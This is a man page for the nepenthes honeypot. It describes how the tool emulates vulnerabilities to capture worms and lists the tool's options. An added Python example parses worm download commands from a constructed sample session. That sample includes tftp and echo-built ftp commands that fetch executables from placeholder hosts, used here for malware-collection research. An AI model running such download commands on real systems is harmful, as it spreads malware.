Provided by: nepenthes_0.1.5-1_i386

NAME

       nepenthes - finest collection -

SYNOPSIS

       nepenthes [OPTIONS]

       nepenthes [OPTIONS] [PATH]

DESCRIPTION

       By emulating widespread vulnerabilities, Nepenthes is able to catch and
       store worms that use these vulnerabilities. Furthermore, you can
       determine the malware activity on a network by deploying a nepenthes
       sensor. The program emulates different well-known vulnerabilities and
       waits for malicious connections trying to exploit them. If a
       connection tries to exploit something, nepenthes tries to guess which
       exploit is going to be used. There are several different ways an
       exploitation can happen; the attacker can ask nepenthes to

       * connect to a provided IP and port and offer a shell there (connectback)
       * bind a shell on a port (bindshell)
       * directly execute a shell command
       * download a file from a provided URL and execute the file
       * use specific file transfer mechanisms to transfer the file (link, blink, mydoom ...)

       If a shell is expected (bindshell or connectback shell), nepenthes will
       offer this shell to the attacker and fulfill the requested actions.
       In most cases there are two ways worms try to spread themselves using a
       shell:

       tftp - trivial file transfer protocol, using tftp.exe in Microsoft Windows.
       ftp - file transfer protocol, using ftp.exe in Microsoft Windows.

       Nepenthes will parse the shell instructions and try to download the
       file; upon success the file will be stored.
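
       An added illustration (not nepenthes code) of the shell-instruction
       parsing described above: it extracts tftp and ftp download locations
       from a constructed command session without fetching anything. The
       function names, the result layout and the sample addresses
       (documentation range 192.0.2.0/24) are assumptions.

```python
import re

# Constructed sample of shell input as a honeypot shell emulation might log it.
SAMPLE_SESSION = (
    "tftp -i 192.0.2.10 GET sample1.exe\n"
    "echo open 192.0.2.20 2121 > o & echo user anon pw >> o & "
    "echo get sample2.exe >> o & echo quit >> o & ftp -n -s:o\n"
)

def parse_ftp_script(lines):
    """Walk an ftp.exe command script and collect every 'get' as a download."""
    host, port, user, found = None, 21, None, []
    for line in lines:
        w = line.split()
        verb = w[0].lower() if w else ""
        if verb == "open" and len(w) >= 2:
            host = w[1]
            port = int(w[2]) if len(w) > 2 and w[2].isdigit() else 21
        elif verb == "user" and len(w) >= 2:
            user = w[1]
        elif verb == "get" and len(w) >= 2 and host:
            found.append({"proto": "ftp", "host": host, "port": port,
                          "user": user, "file": w[1]})
    return found

def parse_session(text):
    """Return download descriptors found in tftp/ftp shell commands (no I/O)."""
    scripts, downloads = {}, []   # scripts: files built by 'echo ... > name'
    for cmd in re.split(r"[&\r\n]+", text):
        cmd = cmd.strip()
        m = re.match(r"echo\s+(.*?)\s*(>>?)\s*(\S+)$", cmd, re.I)
        if m:
            line, mode, name = m.groups()
            if mode == ">":           # '>' truncates, '>>' appends
                scripts[name] = []
            scripts.setdefault(name, []).append(line)
            continue
        words = cmd.split()
        prog = re.sub(r"\.exe$", "", words[0].lower()) if words else ""
        if prog == "tftp":
            args = [w for w in words[1:] if not w.startswith("-")]
            if len(args) >= 3 and args[1].lower() == "get":
                downloads.append({"proto": "tftp", "host": args[0],
                                  "port": 69, "file": args[2]})
        elif prog == "ftp":
            for w in words[1:]:
                if w.lower().startswith("-s:"):   # -s:FILE names the script
                    downloads += parse_ftp_script(scripts.get(w[3:], []))
    return downloads
```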

OPTIONS

       -c PATH, --config=PATH
              PATH to nepenthes.conf

       -d PATTERN, --disk-log=PATTERN
              apply filter to disk logging. PATTERN can consist of crit,
              warn, info, debug and spam; combine tags using a comma (,).

       -f OPTIONS PATH, --file-check=OPTIONS PATH
              Use Nepenthes to check if a file or a directory of files in PATH
              contain known shellcodes.  PATH can be a directory  or  multiple
              files. OPTIONS can be rmknown,rmnonop,nothing.

       -h, --help
              show help

       -H, --large-help
              show help with default values

       -i, --info
              how to contact us

       -k, --check-config
              check nepenthes.conf config for syntax errors

       -l PATTERN, --log=PATTERN
              apply filter to console logging. PATTERN can consist of crit,
              warn, info, debug and spam; combine tags using a comma (,).

       -L, --logging-help
              display help for -d and -l

       -o, --no-color
              log without colors to console (does not work yet).

       -r PATH, --chroot=PATH
              chroot to PATH

       -R, --ringlog
              use ringlogger instead of filelogger

       -u USER, --user=USER
              switch the user the process runs as. USER must be a user name.

       -g GROUP, --group=GROUP
              switch the process group. GROUP must be a group name.

       -v, --version
              show version

       -w, --workingdir
              working directory the process should run in

EXAMPLES

       nepenthes -d crit,warn,info
                 start nepenthes and log only messages with log level critical,
                 warning and info to disk

       nepenthes -u marshall -g mother
                 start nepenthes and change to user marshall and group mother.

       nepenthes -r /opt/nepenthes
                 start nepenthes and chroot to /opt/nepenthes

       nepenthes -u marshall -g mother -r /opt/nepenthes
                 start nepenthes and change to user marshall and group  mother
                 and  chroot to /opt/nepenthes

       nepenthes -f rmknown,rmnonop,dononp /var/lib/nepenthes/hexdumps/
                 check  the  directory  /var/lib/nepenthes/hexdumps  for known
                 shellcodes,  remove  known  shellcodes,   remove   shellcodes
                 without nop slide, check shellcodes without nopslide.

       nepenthes -f nothing /tmp/*.bin /tmp/unknown_shellcodes/
                 check the files matching /tmp/*.bin and the files in the
                 directory /tmp/unknown_shellcodes/ for known shellcodes, do
                 nothing.

FILES

       /etc/nepenthes/nepenthes.conf
              nepenthes configuration file

       /usr/lib/nepenthes/
              nepenthes modules

       /etc/nepenthes/
              nepenthes modules configuration files

AUTHORS

       This page was written by Markus Koetter
       <nepenthesdev@users.sourceforge.net> for version 0.1.3 of nepenthes. It
       was adapted for Debian by Luciano Bello <luciano@linux.org.ar>.

       Nepenthes is developed by Paul Baecher and Markus Koetter.
       http://nepenthes.sourceforge.net/